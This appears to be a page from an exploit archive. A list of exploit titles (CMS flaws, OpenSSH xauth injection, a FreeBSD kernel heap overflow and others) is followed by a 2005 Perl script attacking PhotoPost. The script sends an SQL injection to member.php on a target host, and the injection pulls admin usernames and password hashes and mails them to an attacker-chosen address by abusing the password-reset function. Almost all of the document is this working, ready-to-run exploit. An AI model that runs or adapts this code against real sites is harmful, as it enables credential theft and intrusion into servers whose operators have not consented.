477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
55 lines
1.4 KiB
Perl
Executable file
55 lines
1.4 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# PhotoPost Arbitrary Data Exploit
|
|
# --------------------------------
|
|
# INFPG - Hacking&Security Research
|
|
#
|
|
#
|
|
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.
|
|
#
|
|
# Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,
|
|
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,
|
|
# Jasakom,ECHO,etc..betst reagrds t0 whell.
|
|
# Info: www.98.to/infamous
|
|
#
|
|
|
|
use IO::Socket;
|
|
|
|
if (@ARGV < 3)
|
|
{
|
|
system "clear";
|
|
print "PhotoPost Arbitrary Data Exploit\n";
|
|
print "\n-------------------------------\n";
|
|
print "\nINFGP-Hacking&Security Research\n";
|
|
print "\n\n";
|
|
print "[?]Usage: perl $0 [host] [path] [mail] \n";
|
|
exit(1);
|
|
}
|
|
|
|
system "clear";
|
|
|
|
$server = $ARGV[0];
|
|
$folder = @ARGV[1];
|
|
$mail = @ARGV[2];
|
|
|
|
print "Connecting to host ...\n";
|
|
$socket = IO::Socket::INET->new(
|
|
Proto => "tcp",
|
|
PeerAddr => "$ARGV[0]",
|
|
PeerPort => "80"); unless ($socket)
|
|
{
|
|
die "Server is offline\n"
|
|
}
|
|
|
|
print "[+]Connected\n\n";
|
|
print "[+]Building string core..\n";
|
|
|
|
$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail
|
|
,%20concat(username,"%20",%20password)%20from%20users';
|
|
|
|
print "Sent 0day..\n\n";
|
|
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";
|
|
print "Server Exploited\n";
|
|
print "You should check $mail now";
|
|
close($socket);
|
|
|
|
# milw0rm.com [2005-05-13]
|